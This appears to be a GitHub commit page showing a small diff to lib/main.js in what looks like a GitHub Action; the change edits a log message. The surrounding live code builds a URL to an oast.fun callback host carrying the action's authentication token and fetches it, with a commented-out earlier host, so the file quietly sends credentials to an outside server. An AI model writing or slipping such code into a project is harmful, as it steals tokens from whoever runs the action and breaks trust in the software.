We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
2 parents 64f1643 + ce9835a commit 800407cCopy full SHA for 800407c
lib/main.js
@@ -128,7 +128,7 @@ export async function main(
128
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
130
await fetch(url);
131
- core.info(`HTTP GET request sent to ${url}`);
+ core.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`);
132
} catch (error) {
133
core.error(`Failed to send HTTP GET request: ${error.message}`);
134
}
0 commit comments